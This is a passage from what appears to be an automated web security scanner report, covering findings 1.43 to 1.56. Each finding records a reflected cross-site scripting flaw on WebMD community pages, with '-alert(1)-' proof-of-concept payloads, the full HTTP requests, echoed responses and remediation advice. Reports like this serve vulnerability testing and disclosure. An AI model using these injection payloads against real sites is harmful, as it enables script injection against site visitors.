Path:   /webmd-exchanges/pregnancy-exchanges

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87ef7'-alert(1)-'a2c8c40a0fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges87ef7'-alert(1)-'a2c8c40a0fc/pregnancy-exchanges HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59536
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp4
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:40 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
html.ng/transactionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=&au1=&au2=&uri=%2f404%3faspxerrorpath%3d%252fwebmd-exchanges87ef7'-alert(1)-'a2c8c40a0fc%252fpregnancy-exchanges&artid=091e9c5e804851a3&inst=0&amp;leaf=">
...[SNIP]...

1.43. http://exchanges.webmd.com/webmd-exchanges/pregnancy-exchanges [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/pregnancy-exchanges

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 32a56'-alert(1)-'a9d18542197 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/pregnancy-exchanges32a56'-alert(1)-'a9d18542197 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59536
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp2
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:52 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=&au1=&au2=&uri=%2f404%3faspxerrorpath%3d%252fwebmd-exchanges%252fpregnancy-exchanges32a56'-alert(1)-'a9d18542197&artid=091e9c5e804851a3&inst=0&amp;leaf=">
...[SNIP]...

1.44. http://exchanges.webmd.com/webmd-exchanges/pregnancy-exchanges [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/pregnancy-exchanges

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4948'-alert(1)-'50d65f45c5c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/pregnancy-exchanges?c4948'-alert(1)-'50d65f45c5c=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 73372
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp4
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:27 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
/transactionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=3552&sec=8000|8001&au1=&au2=&uri=%2fwebmd-exchanges%2fpregnancy-exchanges%3fc4948'-alert(1)-'50d65f45c5c%3d1&artid=091e9c5e80561ab8&inst=0&amp;leaf=">
...[SNIP]...

1.45. http://exchanges.webmd.com/webmd-exchanges/pregnancy-exchanges [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/pregnancy-exchanges

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5fe19"-alert(1)-"066c8de0019 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/pregnancy-exchanges?5fe19"-alert(1)-"066c8de0019=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 73390
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp4
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:26 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<script language="javascript" type="text/javascript"> var s_furl="/webmd-exchanges/pregnancy-exchanges?5fe19"-alert(1)-"066c8de0019=1"; var s_sponsor_program=""; var s_sensitive="false"; var image_server_url="http://img.webmd.com/dtmcms/live"; var space_id=""; var space_title=""; var space_name=""; var space_type=""; var space_sit
...[SNIP]...

1.46. http://exchanges.webmd.com/webmd-exchanges/sex-relationships-exchanges [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/sex-relationships-exchanges

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9c8b'-alert(1)-'50fa5ae1c70 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchangesa9c8b'-alert(1)-'50fa5ae1c70/sex-relationships-exchanges HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59560
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp3
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:07 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
html.ng/transactionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=&au1=&au2=&uri=%2f404%3faspxerrorpath%3d%252fwebmd-exchangesa9c8b'-alert(1)-'50fa5ae1c70%252fsex-relationships-exchanges&artid=091e9c5e804851a3&inst=0&amp;leaf=">
...[SNIP]...

1.47. http://exchanges.webmd.com/webmd-exchanges/sex-relationships-exchanges [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/sex-relationships-exchanges

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8cd08'-alert(1)-'d156ed31468 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/sex-relationships-exchanges8cd08'-alert(1)-'d156ed31468 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59560
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp2
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:19 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=&au1=&au2=&uri=%2f404%3faspxerrorpath%3d%252fwebmd-exchanges%252fsex-relationships-exchanges8cd08'-alert(1)-'d156ed31468&artid=091e9c5e804851a3&inst=0&amp;leaf=">
...[SNIP]...

1.48. http://exchanges.webmd.com/webmd-exchanges/sex-relationships-exchanges [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/sex-relationships-exchanges

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56a41'-alert(1)-'816ff3601e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/sex-relationships-exchanges?56a41'-alert(1)-'816ff3601e9=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 66812
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp4
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:53:56 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
tionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=3552&sec=8000|8001&au1=&au2=&uri=%2fwebmd-exchanges%2fsex-relationships-exchanges%3f56a41'-alert(1)-'816ff3601e9%3d1&artid=091e9c5e8055d1b0&inst=0&amp;leaf=">
...[SNIP]...

1.49. http://exchanges.webmd.com/webmd-exchanges/sex-relationships-exchanges [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/sex-relationships-exchanges

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21ab4"-alert(1)-"bf6089d9642 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/sex-relationships-exchanges?21ab4"-alert(1)-"bf6089d9642=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 66824
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp3
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:53:55 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<script language="javascript" type="text/javascript"> var s_furl="/webmd-exchanges/sex-relationships-exchanges?21ab4"-alert(1)-"bf6089d9642=1"; var s_sponsor_program=""; var s_sensitive="false"; var image_server_url="http://img.webmd.com/dtmcms/live"; var space_id=""; var space_title=""; var space_name=""; var space_type=""; var space_sit
...[SNIP]...

1.50. http://exchanges.webmd.com/webmd-exchanges/trying-to-conceive-exchanges [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/trying-to-conceive-exchanges

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6610'-alert(1)-'7de7f94fa7a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchangesb6610'-alert(1)-'7de7f94fa7a/trying-to-conceive-exchanges HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59563
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp2
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:42 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
html.ng/transactionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=&au1=&au2=&uri=%2f404%3faspxerrorpath%3d%252fwebmd-exchangesb6610'-alert(1)-'7de7f94fa7a%252ftrying-to-conceive-exchanges&artid=091e9c5e804851a3&inst=0&amp;leaf=">
...[SNIP]...

1.51. http://exchanges.webmd.com/webmd-exchanges/trying-to-conceive-exchanges [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/trying-to-conceive-exchanges

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eeda8'-alert(1)-'e25056739 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/trying-to-conceive-exchangeseeda8'-alert(1)-'e25056739 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59557
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp3
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:54 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=&au1=&au2=&uri=%2f404%3faspxerrorpath%3d%252fwebmd-exchanges%252ftrying-to-conceive-exchangeseeda8'-alert(1)-'e25056739&artid=091e9c5e804851a3&inst=0&amp;leaf=">
...[SNIP]...

1.52. http://exchanges.webmd.com/webmd-exchanges/trying-to-conceive-exchanges [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/trying-to-conceive-exchanges

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50e6d"-alert(1)-"ab799eb0e25 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/trying-to-conceive-exchanges?50e6d"-alert(1)-"ab799eb0e25=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 71080
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp4
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:28 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<script language="javascript" type="text/javascript"> var s_furl="/webmd-exchanges/trying-to-conceive-exchanges?50e6d"-alert(1)-"ab799eb0e25=1"; var s_sponsor_program=""; var s_sensitive="false"; var image_server_url="http://img.webmd.com/dtmcms/live"; var space_id=""; var space_title=""; var space_name=""; var space_type=""; var space_sit
...[SNIP]...

1.53. http://exchanges.webmd.com/webmd-exchanges/trying-to-conceive-exchanges [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/trying-to-conceive-exchanges

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac74c'-alert(1)-'192a93c0ff0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/trying-to-conceive-exchanges?ac74c'-alert(1)-'192a93c0ff0=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 71060
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp1
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:29 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
ionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=3552&sec=8000|8001&au1=&au2=&uri=%2fwebmd-exchanges%2ftrying-to-conceive-exchanges%3fac74c'-alert(1)-'192a93c0ff0%3d1&artid=091e9c5e805cbf41&inst=0&amp;leaf=">
...[SNIP]...

1.54. http://exchanges.webmd.com/webmd-exchanges/womens-health-exchanges [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/womens-health-exchanges

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 143b5'-alert(1)-'e20daef9f7d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges143b5'-alert(1)-'e20daef9f7d/womens-health-exchanges HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59548
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp4
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:20 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
html.ng/transactionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=&au1=&au2=&uri=%2f404%3faspxerrorpath%3d%252fwebmd-exchanges143b5'-alert(1)-'e20daef9f7d%252fwomens-health-exchanges&artid=091e9c5e804851a3&inst=0&amp;leaf=">
...[SNIP]...

1.55. http://exchanges.webmd.com/webmd-exchanges/womens-health-exchanges [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/womens-health-exchanges

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4fe4'-alert(1)-'9a71d5e7389 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/womens-health-exchangesa4fe4'-alert(1)-'9a71d5e7389 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59548
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp3
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:33 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
sID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=&au1=&au2=&uri=%2f404%3faspxerrorpath%3d%252fwebmd-exchanges%252fwomens-health-exchangesa4fe4'-alert(1)-'9a71d5e7389&artid=091e9c5e804851a3&inst=0&amp;leaf=">
...[SNIP]...

1.56. http://exchanges.webmd.com/webmd-exchanges/womens-health-exchanges [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/womens-health-exchanges

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 234df"-alert(1)-"24c278a6922 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/womens-health-exchanges?234df"-alert(1)-"24c278a6922=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 74543
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp1
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:05 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
